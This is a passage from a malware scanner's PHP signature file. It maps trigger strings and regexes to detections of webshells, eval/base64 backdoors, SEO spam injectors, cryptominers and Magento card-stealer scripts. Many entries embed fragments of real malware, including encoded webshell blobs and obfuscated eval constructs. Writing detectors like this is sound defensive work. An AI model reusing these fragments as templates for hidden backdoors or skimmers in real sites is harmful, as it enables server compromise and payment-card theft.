			'e";eval($' => array(STR_CLEAR_LINEMATCH, 'php.malware.visitor_tracker.003', '<!--\w{32}-->\s*<\?php\s*\$\w+=("[base64_dco]+"\.)+"[base64_dco]+";\s*eval\(\$\w+\(.\w{300}[^;]+\)\);\?><!--\w{32}-->'),
		),
	),

	'function decode($' => array(STR_TRIGGER, 

		'$code = base64_decode("' => array(STR_TRIGGER, 
			'$code = decode($code);' => array(STR_TRIGGER,
				'eval($code);' => array(STR_CLEARFILE,'php.backdoor.filesman.025', NULL),
			),
		),
		
		'code = $str_auth->decode($code,' => array(STR_CLEARFILE, 'php.backdoor.uploader.404', NULL),
	),

	'[$i] = chr(ord($' => array(STR_TRIGGER,
		'gzinflate($code($' => array(STR_TRIGGER,
			'\'e64_d\'' => array(STR_CLEARFILE, 'php.backdoor.webshell.003', NULL),
			'"e64_d"' => array(STR_CLEARFILE, 'php.backdoor.webshell.003.02', NULL),
		),
	),

	'window.on' => array(STR_TRIGGER,
		'eval(y.responseText.split(\'###' => array(STR_TRIGGER,
			'##\')[1]);}}};y.send(null);}var' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.044', 'window\.on[^\0]+?\{\s*eval[^\.]+?\.responseText\.split\(["\']###["\']\)\[1\]\);\}\}\};[^\}]+?\}[^\}]+?\}\}\}\}[^\}]+?\}'),
			'##\')[1]);}}};y.send(null);}geos' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.044.02', 'function [\w]+\(\)\{var gae=.UA[^,]+,[\w]+=localStorage;if\(typeof\(Storage\)\!==.undefined.\)[^#]+eval\(y.responseText.split\(.###[^\.]+\.send\(null\);\}geos[^;]+;\}\}\}[\w]+\(\);'),
		),
	),

	'=__FILE__;' => array(STR_TRIGGER,

		't13\';' => array(STR_TRIGGER,
			'(\'\',eval($' => array(STR_CLEARFILE, 'php.malware.obfuscated.009', NULL),
		),

		'kr9NHenNHenNHe1lFMamb3klFoxiC2APk19gOLlHOa9gkZXJkZwVkr9NTznNHr8XHt4JkZwS' => array(STR_CLEARFILE, 'php.backdoor.webshell.009', NULL),
	),

	'eval(curl_exec' => array(STR_TRIGGER,
		
		'(isset($_GET[' => array(STR_TRIGGER,
			'eval(curl_exec(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.curl.012.02', 'if[\s]*\(isset\(\$_GET\[[^\]]+\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$_GET\[[^\]]+\];[\s]*if[\s]*\(\$[\w]+[\s]*=[\s]*curl_init[^\}]+eval\(curl_exec[^\}]+exit;[\s]*\}[\s]*\}'),
		),

		'eval(curl_exec($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.curl.012', 'if[\s]*\([\s]*\$[\w]+[\s]*=[\s]*curl_init[^\}]+eval\(curl_exec[^\}]+(exit;[\s]*)?\}'),
	),

	'UmFkYXJ8' => array(STR_TRIGGER,

		'.=substr($' => array(STR_TRIGGER,
			'="";foreach($' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.189', '(function\s*\w+[^\(]+\(\$\w+,\$\w+\)\{)?\s*\$\w+=.[^\}]+\}return[^\{]+eval\(\$[\w]+\..\("[^"]+"\)\);.\);[\s]*\/\*[^\*]+\*\/'),
		),

		'*/ eval(base64_decode("' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.189.02', '\/\*[^\*]+\*\/[\s]*eval.base64_decode\("[^"]+"\)\); .\*[^\*]+\*\/'),
	),

	'eval("\x65\x76\x61\x6C' => array(STR_TRIGGER,
		'="eval";eval("\x65' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.028.02', '<\?php \$\w+="\w{60,80}\";\$eval="\w+";\$\w+="eval";eval..\\\x65.x76[^; ]+;\s+\?>'),
		'eval("\x65\x76\x61\x6C' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.028', '(\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]+\s*=\s*array.((.{50}),){20}[^;]+;)?\s*(\$\w+\s*=\s*[\'"]\w+[\'"];\s*)?eval...x65.x76.x61.x6C[^; ]+;'),
	),

	'=eval(chr(' => array(STR_TRIGGER,
		'if(!isset($_REQUEST[chr(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_chr.001', 'if..isset.\$_REQUEST.(chr\([0-9]+\).)+[^;]+echo (chr\([0-9]+\).)+[^;]+eval\((chr\([0-9]+\).)+;[^\s]+;'),
		'=eval(chr(47).chr(42).chr(116).chr(116).chr(42).chr(47).chr(36).chr(122)' => array(STR_CLEARFILE,'php.backdoor.generic.029', NULL),
	),

	'function mod_xpdo_error' => array(STR_TRIGGER,
		'function mod_xpdo_compile' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.fake_modx_xpdo.001', 'if..function_exists.\\\?.mod_xpdo_compile\\\?.\)\)\s*\{\s*\/\**.{400,}?<address>Apache.2.2.22.{1000,}?_output = \$file;\s*\}\s*break;\s*\}'),
		'("a5zlfXtf' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.fake_modx_xpdo.002', 'function mod_xpdo_error[^\$]+\$mhash[^\}\@]+\@eval\([^\)]+?a5zl[^\)]+\)\)\)\);'),
	),

	'("return eval' => array(STR_TRIGGER,
		'eval("return eval(\"$code\");' => array(STR_CLEARFILE, 'php.spam-seo.injector.001.014', NULL),
		'eval("return eval(\"$ed__k\")' => array(STR_CLEARFILE, 'php.backdoor.filesman.007', NULL),
	),

	'])){eval(base64_decode(str_replace(chr(' => array(STR_TRIGGER,
		'if(!@$_COOKIE[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.067', 'global \$[\w]+;[\s]*if\(!\$[\w]+\)[\s]*\{[\s]*\$[^@]+if\(!@\$_COOKIE[^:]+http(s)?:[^\]]+\]\)\)\{eval\(base64_decode\(str_replace\(chr\([^}]+exit;\}[\s]*\}'),
		';foreach(array' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.067.02', '(\$\w+) *= *substr\(\d+,\d+\);foreach\(array\((?:\d+,?)+\) *as *(\$\w+)\)\{\1\.=sprintf\(\(substr\(urlencode[^@]+substr\(\1,\2\);\}\$d=@\$_COOKIE[^@]+eval\(base64_decode\(str_replace\(chr[^;]+;exit;\}'),
	),

	'@eval(get_option(\'blogoption' => array(STR_TRIGGER,
		'add_filter(\'the_content' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.wp_worm.002', 'add_filter..the_content., ._bloginfo[^\?>]+?=\@eval.get_option..blogoption[^\?>]+?else return \$content;\s*\}'),
		' _theme_setup()' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_worm.002.03', '(?:\/\/beginXX[^f]{1,3}?function +_theme_setup\(\)[^@]+\$links=eval\(file_get_contents\([^@]+@fopen\(TEMPLATEPATH[^\}]+\}[^_]{1,3}?_theme_setup\(\);[^e]{1,3}?\/\/endXX|function wp_side\(\)[^@]+echo @eval\(get_option\(.blogoption.\)\);[^\}]+\})'),
	),

	'(?i)base64_decode\(' => array(REX_TRIGGER,
		'ZWNobyAnaXpvY2luPGJyPi' => array(STR_CLEARFILE, 'php.backdoor.eval_gen.026', NULL),
		'cGFzdGUuc2UvcmF3' => array(STR_CLEARFILE, 'php.backdoor.curl.028', NULL),
	),

	'=window;' => array(STR_TRIGGER,
		'=document;' => array(STR_TRIGGER,
			'.body)}catch(' => array(STR_TRIGGER,
				'if(1)' => array(STR_TRIGGER,
					'+=String["fromCharCode"](eval(' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.032', '([\w]+=[^;\s]+;)+try\{\+\+\([\w]+\.body\)\}catch\([\w]+\)\{[\w]+=false;try\{\}catch\([\w]+\)\{[^}]+\}[\s]*if\([\d]+\)[\s]*\{[\s]*[\w]+=.([a-f0-9]+[,:]){20}[^;]+;[\s]*}[^>]+eval;[\s]*[\w]+\([\w]+\)}'),
				),
			),
		),
	),

	'["length"];' => array(STR_TRIGGER,
		'].apply(String,' => array(STR_TRIGGER,
			')+parseInt(' => array(STR_TRIGGER,
				'if(document.querySelector)' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.032.02', '([\w]+=["+fromChacde]+;)?if\(document.querySelector\)[\w]+=[\d]+;[\w]+=\("[a-z0-9,]{300}[^>]+apply\(String,[\w]+\)\);'),
			),
		),
	),

	'// ?><?php' => array(STR_TRIGGER,
		'><?php //' => array(STR_TRIGGER,
			'=strrev(str_ireplace("' => array(STR_TRIGGER,
				'";eval($' => array(STR_CLEARFILE, 'php.malware.strrev.005', NULL), //reworked by PG to cover variants and moved here from spam-seo.
			),
		),
	),

	'=call_user_func($' => array(STR_TRIGGER,
		'].$' => array(STR_TRIGGER,
			'],$' => array(STR_TRIGGER,
				'eval($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.062', '\$[\w]+="[^"]+";[\s]*\$[\w]+="[\w_]{17}";[\s]*\$[\w]+=call_user_func\(\$[\w]+\[[\d]+\]\.\$[^;]+,\$[\w]+\);[\s]*\$[\w]+=call_user_func\(\$[\w]+\[[\d]+\]\.[^;]+,\$[\w]+\);[\s]*eval\(\$[\w]+\);'),
			),
		),
	),

	'!empty($_POST[' => array(STR_TRIGGER,
		'$version =' => array(STR_TRIGGER,
			'e";' => array(STR_TRIGGER,
				'@eval($' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.068', NULL),
			),
		),
	),

	'function parseSession' => array(STR_TRIGGER,
		'$b64 = "ABCDEFGHIJ' => array(STR_TRIGGER,
			'$this->parseSession($_POST[$config[\'UID\']]);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.joomla_gen.004', 'function sessionStart..session...[\\s]*if.!empty..session..[\\s]*return[\\s]*eval..session.;[\\s]*}'),
		),
	),

	'=rtrim($' => array(STR_TRIGGER,
		'].substr($' => array(STR_TRIGGER,
			'=chop($value,"\151\156\147");' => array(STR_CLEARFILE, 'php.backdoor.filesman.096', NULL),
		),
	),

	'while(x=eval(x));' => array(STR_TRIGGER,
		'<script type="text/javascript">' => array(STR_TRIGGER,
			'tAedoCrahc.x(edoCrahCmorf' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.023', '<script type=.text.javascript.>[\s]*..<!\[CDATA\[[\s]<!--[\s]*var x="function f.x.\{var[\s]*i,o=....,ol=x\.length[^<]+<i[^>]+while\(x=eval\(x\)\);[\s]*..-->[\s]*..\]\]>[\s]*<.script>'),
		),
	),

	'strrev(\'edoced_46esab\');' => array(STR_TRIGGER,
		'strrev(\'etalfnizg\');' => array(STR_TRIGGER,
			'(implode(\'\',$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.321', '\$[\w]+[\s]*=[\s]*array\([^\)]{2000,}\);[\s]*(\$[\w]+[\s]*=[\s]*strrev[^;]+\);[\s]*)+eval\([^;]+\);'),
		),
	),

	'(implode(' => array(STR_TRIGGER, 
		'strrev' => array(STR_TRIGGER, 
			'(\$\w+\s*=\s*strrev\([\'"\._\w]+\);){2}eval\(' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.eval_strrev.001', '<\?php\s*(\$\w+)\s*=\s*array\(.[\'"\w=\+\/,]+\);(\$\w+)\s*=\s*strrev\([\'"\._\w]+\);(\$\w+)\s*=\s*strrev\([\'"\._\w]+\);eval\(\3\(\2\(implode\(..,\1\)\)\)\);\s*\?>'),
		),
	),

	'sprintf(eval("\$_' => array(STR_TRIGGER,
		'\'done\';} else {\x' => array(STR_CLEARFILE, 'php.mailer.POST.027', NULL),
	),
	
	'])&&(md5($_POST[' => array(STR_TRIGGER,
		'eval(rawurldecode(base64_decode($_POST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.071', 'if[\s]*\(\(isset\(\$_POST\[[^&]+\)&&\(md5\(\$_POST[^;]+eval\(rawurldecode\(base64_decode\(\$_POST\[.[\w]+.\]\)\)\);'),
	),

	'if(isset($HTTP_POST_VARS) && isset($HTTP_POST_VARS[' => array(STR_TRIGGER,
		'eval(pack(\'H*\', $HTTP_POST_VARS[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.072', NULL),
	),

	'\x65\x76\x61\x6c' => array(STR_TRIGGER,
		'"]].join(\"\");"));' => array(STR_CLEAR_MULTIMATCH, 'js.malware.eval_hex.001', '(\/\*\w+\*\/);window(\[..x\w+[^\]]+x\w+.\]){2}=\[.(.x\w+)[^;]+;var\s*(\w+=){1,}window[^\*]+\]\]\.join\([^\*]+;[\s]*\1'),
	),

	'WSO' => array(STR_TRIGGER,
		'FilesMan' => array(STR_CLEARFILE, 'php.backdoor.WSO.008', NULL),
	),

	'=str_rot13(base64_decode($' => array(STR_TRIGGER,
		'] = chr(ord($' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.073', NULL),
	),

	'\'........' => array(STR_TRIGGER,
		'])];} eval($' => array(STR_CLEARFILE, 'php.backdoor.uploader.127', '\$[\w]+=\'[preglac_\'\.\s]{15,};[\s]*\$[\w]+="[\w]+"\^"[^;]+\\\\x[\w]{2}[^;]+";[\s]*\$[\w]+\([^\)]+"[\s]*\^[\s]*"[^\)]+"[\w]+"\);'),
	),

	'$activate_ssl = activate_ssl();' => array(STR_TRIGGER,
		'(get_token($CERTIFICATE))))));' => array(STR_CLEARFILE, 'php.backdoor.filesman.059', NULL),
	),

	'/g,"\\\\")}eval(' => array(STR_TRIGGER,
		'\]\.replace\(.[\x01\x02\x03\x04].g,...\)\.replace\(.[\x02\x03\x01\x04].g,".."\)\}eval\(' => array(REX_CLEARFILE, 'js.malware.cryptominer.016', NULL),
	),

	'implode(\'_\',$' => array(STR_TRIGGER,
		'return eval($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_gen.016', '(\w+\(\))\s*;[^\2]+function\s*\1\s*{\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*\$\w+\s*=\s*\2\[[^\(]+\([^;]+;\s*(\$\w+)\s*=\s*implode\([^\)]+\)\s*;\s*return\s*eval\(\3\(\2\)\)\s*;\s*}'),
	),

	'<\?php[\s]*@?eval' => array(REX_TRIGGER,
		'<\?php[\s]*@?eval[\s]*\([\s]*\$_POST[^\)]*\);?([\s]*\?>)?' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.028', '<\?php[\s]*@?eval[\s]*\([\s]*\$_POST[^\)]*\);?([\s]*\?>)?'),
	),


	'116,101,115,116,40,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110' => array(STR_TRIGGER,
		'99,104,101,99,107,111,117,116' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.015.02', '(?:this\[.eval.\]|eval\s*\(\s*[Ss]tring\.[Ff]rom[Cc]har[Cc]ode\s*)(?:["\']\])?\([^\)]+?\)\);'),
	),

	'iPhone|iPad|iPod' => array(STR_TRIGGER,
		'=join(pop());eval(' => array(STR_CLEAR_MULTIMATCH, 'js.redirect.window_location.012', '\/\/[\s]*[\w]+[\s]*for[\s]*\([\s]*[\w]+[\s]*=[\s]*\'[^\']+\',[\s]*i[\s]*=[\s]*0[^\)]+\)[\s]*with[^;]+join\(pop\(\)\);[\s]*eval\([\w]+\);?[\s]*\/\/[\s]*[\w]+'),
	),

	'];eval($' => array(STR_TRIGGER,
		'(implode(\'\', $' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.infector.005','\\$[\\w]+ = array\\((\'[^\'"]+\',){20,}\'[^\'"]+\'\\);\\$[\\w]+ = array[^;]+; \\$[\\w]+ = array[^;]+;[^>]+implode\\(.., \\$[\\w]+\\)\\)\\)\\);'), //modified by PG to cover php.spam-seo.injector.029
	),

	'this["eval"](' => array(STR_TRIGGER,
		'fromCharCode(K);H=String(A)' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.031', 'this\["eval"\]\((?:[^\.]+?\.){1,40}?fromCharCode\(K\);H=String\(A\)[^;]+?;\s*?return\s*?H\.charAt[^\}]+?\}\s*?\)\s*?\)\s*?;'),
	),

	'fromCharCode\';i=(i+1)%' => array(STR_TRIGGER,
		'window["eval"]("eval");' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-iframe.010', '<script[^>]+?>function[^>]+?window\["eval"\]\("eval"\);[^>]+?fromCharCode\';i=\(i\+1\)%[^>]+?\^[^<]+?<\/script>'),
	),

	'>h9b8himkm8moojn>kbi?!*(3,;.?z)' => array(STR_CLEARFILE, 'php.malware.generic-gzinflate-preg_match.002', NULL),
	'eval(gzinflate($adel(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_gen.014', '\$adel\s*=\s*[^;]+;\s*eval\(gzinflate\(\$adel\([^\)]+\)\)\);'),
	'eval(gzuncompress("' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.filesman.038', 'eval\(gzuncompress\("[^\n\r]+"\)\);'),
	'eval(gzuncompress(\'' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.filesman.038.002', 'eval\(gzuncompress\(\'[^\n\r]+\'\)\);'),
	'$part2=\'MVViR2xaVkdoc1RucFZNbGxxVVROYWFrRnBUM2R2YTFreU9' => array(STR_CLEARFILE, 'php.backdoor.filesman.055', NULL),
	'(\'I3hnd3d5DQpAZXJyb3JfcmVwb3J0aW5nKDApOyNnd' => array(STR_CLEARFILE, 'php.hacktool.mailer.069', NULL),
	'eval(gzuncompress(str_rot13(base64_decode(\'a5x6Q9FXwzAUfbZfZLkM' => array(STR_CLEARFILE, 'php.backdoor.uploader.112', NULL),
	'if(!isset($_REQUEST[\'gnu\'])||!isset($_REQUEST' => array(STR_CLEAR_NONCONTINUAL, 'php.backdoor.eval_REQUEST.022', '(?:(Copyright\d+_\d+_\d+\(\));\s*function \1\{\s*static \$gnu[^\}]+eval\(\$gpl\(\$_REQUEST\[[^\]]+\]\)\);\s*\$gnu=false;\s*\}|Copyright\d+_\d+_\d+\(\);?)'),
	'eval(@$_GET[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_gen.012', 'eval\(@\$_GET\[.[\w]+.\]\);'),
	'@eval(@stripslashes(@$_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.023', '@eval\(@stripslashes\(@\$_REQUEST\[[^;]+;'),
	');}if ($eval){eval($eval);}' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.003.02', NULL),
	'eval($c);function shifr($word' => array(STR_CLEARFILE, 'php.backdoor.eval_shifr.001', NULL),
	'("JHJlZiA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRrZ' => array(STR_CLEAR_LINEMATCH,'php.backdoor.shell-exec.001.002','\$\w+=.b(\.|\"|\s+)*a(\.|\"|\s+)*s(\.|\"|\s+)*e(\.|\"|\s+)*6(\.|\"|\s+)*4(\.|\"|\s+)*[^;]+;eval.\$\w+..JHJlZiA9ICRfU0VSVkVSWydIVFRQX1VTR[^;]+;'),
	'eval(eval("\$_' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.030', NULL),
	'PCT4BA6ODSE_' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.024','\$\w+\s*=.PCT4BA6ODSE_.;\s*\$\w+\s*[^;]+strto(lower|upper)[^;]+;\$\w+\s*[^;]+\[[0-9]{1,}\]\)(\}\[.\w+.\])?;if\s*.isset[^;]+;\}'),
	'HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFU' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.001.06', NULL),
	'7TppUxtJsp+HCP5DusxOS7vowgiwpBaDPWKGeBgYJOzYQISi1F2SO' => array(STR_CLEARFILE,'php.backdoor.c0derzshell.001', NULL),
	'}eval(SED("7b37exvHkSj6O/VXjBFG' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.055', NULL),
	'eval(base64_decode("DQ' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.redirect.004','eval.base64_decode..DQ[^;]+;'),
	'eval($OOO0000O0(\'JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGI1KTskT08'=> array(STR_CLEARFILE, 'php.hacktool.TrYaG.002', NULL),
	'("CmlmKCFkZWZpbmVkKCJDVVJfUEFUSCIpKXsKCWRlZmluZSgiQ1VSX1BB' => array(STR_CLEAR_LINEMATCH, 'php.malware.visitor_tracker.002', '(\$\w+)="b[^;]+?";eval.\1\("CmlmKC[^"]+"\)\);'),
	'("CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaW' => array(STR_CLEAR_LINEMATCH, 'php.malware.visitor_tracker.002.01', '(\$\w+)="b[^;]+?";eval.\1\("Cm[^"]+"\)\);'),
	' = strrev(\'etalfnizg\');eval($' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.030','\$\w+(_)?\w+\s*=\s*array[^;]+;[^>]+edoced_46esab[^>]+strrev..etalfnizg[^>]+implode[^;]+;'),
	'ini_set(\'display_errors\',\'Off\'); @eval' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.050', '\/\*[a-z0-9]{3,15}\*\/[\s]*[^\*]+?\@eval\(\s*base64_decode[^\*]+?\/\*[a-z0-9]{3,15}\*\/'),
	'@eval( base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.026', '@eval..base64_decode[^ ]*;'),
	');eval("?>".$x);' => array(STR_CLEARFILE,'php.backdoor.webshell_gen.38', NULL),
	'"SEARCH TABLES<br>COMMA (,) SEPARATED<br>LEAVE EMPTY FOR ALL"' => array(STR_CLEARFILE,'php.backdoor.rc-shell.001', NULL),
	'|iframe|document|write|src|http|bit|ly|1BC4pKP|width|height|frameborder|marginwidth|marginhe' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.027', '<script[^<]+eval.function.p,a,c,k,e,r[^\n]+iframe.document.write.src.http.bit.ly[^>]+script>'),
	'function fteil_macros' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.051',NULL),
	'$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.041', '\$[0O]+=urldecode\(.%6E1%7A[^;]+\);(\$[0O]+[^;]+;[\s]*)+(@?eval[^;]+\);)?'),
	'aWYoaXNzZXQoJF9HRVRbJ2tsaXZlcnonXSkpew0KDQplY2hvICc8Y2VudGVyPjxiPis' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.052',NULL),
	'Turbo Force By TrYaG.CC' => array(STR_CLEARFILE, 'php.hacktool.TrYaG.001', NULL),
	'eval("return eval(\"$' => array(STR_CLEARFILE,'php.backdoor.filesman.017', NULL),
	'@eval("\$getnum = $uid;");' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.049', '\\$uid=\\$_POST..[\\w]+..;[\\s]*@eval....getnum = .uid..\\);'),
	')@eval($row[1]);echo "|' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_USER_AGENT.002', '\$ua=@\$_SERVER..HTTP_USER_AGENT..;[\s]*\$row[\s]*=[\s]*split[^;]+;echo[^@]+@eval..row....;echo[^;]+;'),
	'(\'eJzlvWt3GsfSKPzZe639H0YTkoE' => array(STR_CLEARFILE, 'php.backdoor.WSO.004', NULL),
	'eval(pack("H*' => array(STR_CLEARFILE, 'php.backdoor.eval_gen.011', NULL),
	')));\';extract([\'f\'=>\'create_function\',\'b\'=>\'base64_decode\']);$' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.botshell.003', '\$[\w]+=[\'"]\$[\w]+=[^;]+;[\s]*eval\(gzuncompress\(base64_decode\(\$[^;]+\)\)\);[\'"];extract\(\[.f.=>.create_function.,.b.=>.base64_decode.\]\);\$[^;]+\)\);\$[\w]+\(\);'),
	'eval((ZWNobyc8QEBAPic7c3lzdGVtKCJj' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST_gen.005', '=chr\(98\)\.chr\(97\)\.chr\(115\)\.chr\(101\)\.chr\(54\)\.chr\(52\)\.chr\(95\)\.chr\(100\)\.chr\(101\)\.chr\(99\)\.chr\(111\)\.chr\(100\)\.chr\(101\)\s*;\s*eval\(\([^\)]+\)\)\s*;'),
	'eval("\x65\x76\x61\x6c\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x73\x74\x72\x5f\x72\x6f\x74\x31\x33\x2' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_gen.017', 'eval\(".x65.x76.x61.x6c.x28.x67[^;]+\);'),
	'("ZXZhbChnemluZmxhdGUoc3RyX3JvdDEzKGJhc2U2NF9kZWNvZGUo' => array(STR_CLEARFILE, 'php.backdoor.injector.122', NULL),
	'\';eval\(\$[^a-zA-Z0-9]+\(\$[^a-zA-Z0-9]+\)\);' => array(REX_CLEARFILE, 'php.malware.obfuscated.018', NULL),
	'2T46Ub71A79K7E92K0Q3dX204172G7261792Q827616E8M69A6X471T6S62' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.110', NULL),
	'intval(__LINE__) * 337;"' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.dgreusdi.001', '(if[\s]*\(isset\(\$_GET\[[^;]+die\(md5\([\w]+\)\);[\s]*\}[\s]*)?eval\([^;]+\*[\s]*[\d]+;.\);[\s]*\$[\w]+[\s]*=[\s]*[^;]+;[\s]*\$[\w]+[\s]*=[\s]*str_replace\(\$[\w]+,[^;]+\);[\s]*(eval[\s]*(\(gzinflate)?\(\(?base64_decode\(\$[\w]+\)\)\);)?'),
	'DQplcnJvcl9yZXBvcnRpbmcoNyk7DQpAc2V0X21hZ2ljX3F1b3Rlc19ydW5' => array(STR_CLEARFILE, 'php.backdoor.webshell.174', NULL),
	'Unknowndevice64' => array(STR_CLEARFILE, 'php.backdoor.webshell.178', NULL),
	'zb1rj+rKkjb4V161+sPbWtJs20CtQj3' => array(STR_CLEARFILE, 'php.malware.filesman.031', NULL),
	'IiwgInskdXNlcmluZm9bImNhcmRfbnVtYmVyIl19f' => array(STR_CLEARFILE, 'php.malware.cc_stealer.003', NULL),
	'JG9iamVjdCA9IG5ldyBNYWdlX0NoZWNrb3V0X0Jsb2NrX09uZXBhZ2VfQmlsbGluZzs' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.098', '\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+[^(]+\(.{200,}\).;eval\(.eval\(.\.\$[\w]+\..\);.\);'),
	'CjaVWqXOsmAQlfK8q+QiJl5iVhSipDyLh8YXyvpIolv7v' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.056', '\$[\w]+[\s]*=[\s]*(.[\w]+.\.?[\s]*)*[^\(]+array\(.[0-9a-zA-Z\/+]+[^;]+.\);[\s]*eval\([\s]*\$[\w]+[\s]*\(\$[\w]+[\s]*\(\$[\w]+[\s]*\(..,\$[\w]+\)\)\)\);'),
	'<?php eval(pack(\'H*\',\'2' => array(STR_CLEARFILE, 'php.malware.obfuscated.046', NULL),
	'eval(compile(zlib.decompress(base64.b64decode("eJydWG1v2zYQ' => array(STR_CLEARFILE, 'py.hacktool.symlink.001', NULL),
	'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA' => array(STR_CLEARFILE, 'py.hacktool.symlink.001.02', NULL),
	'HDCTApGn0!$e%8)4}w{d7a17\\\\\\\\\\\\\\\\7d17\\\\\\\\\\\\\\\\)q $D|GnPP" +' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.013', '<script type="text.javascript">[^>]+var[\s]*x="function[^-]+"[\s]*\+[\s]*("[^\n]+"[\s]*\+[\s]*){3,}"[^\n]+"[\s]*;[\s]*while\(x=eval\(x\)\);[^<]+<.script>'),
	'\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]+\s*=\s*array.(.{26},){50}[^;]+;' => array(REX_CLEAR_MULTIMATCH, 'rex.eval_impode.001', '(\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]+\s*=\s*array.(.{26},){50}[^;]+;)?[^>]+eval[^;]+implode[^;]+;'),
	'if\s*\(\s*isset\s*\(\s*\$\s*\{\s*\$\w+\s*\}\s*\[\s*\'\w+\'\s*\]\s*\)\s*\)\s*\{\s*eval(\s*\(\s*\$\w+)?\s*\(\s*\$\{' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.eval_post.001','\$\w+\s*=\s*"\w+"\s*;\s*\$\w+\s*=[^;]+?\$\w+\[\d\]\s*\.[^\{<>]+?\)\s*;\s*if\s*\(\s*isset\s*\(\s*\$\s*\{\s*\$\w+\s*\}\s*\[\s*\'\w+\'\s*\]\s*\)\s*\)\s*\{\s*eval(\s*\(\s*\$\w+)?\s*\(\s*\$\{[^\)]+\)(\s*\))?\s*;\s*\}'),
	'function ev(){return __FUNCTION__."al"' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.156', '(?:class\s+\w+\s*\{\s*(?:public\s+)?function\s+preg_replace\(\)\{return\s+__FUNCTION__;\}\s*(?:public\s+)?function ev\(\)\{return __FUNCTION__\."al";\}[^;]+?;[^\/]+?\/[^,]+?,\s*\$\w+->ev\(\)\s*\)\s*;\s*)+'),
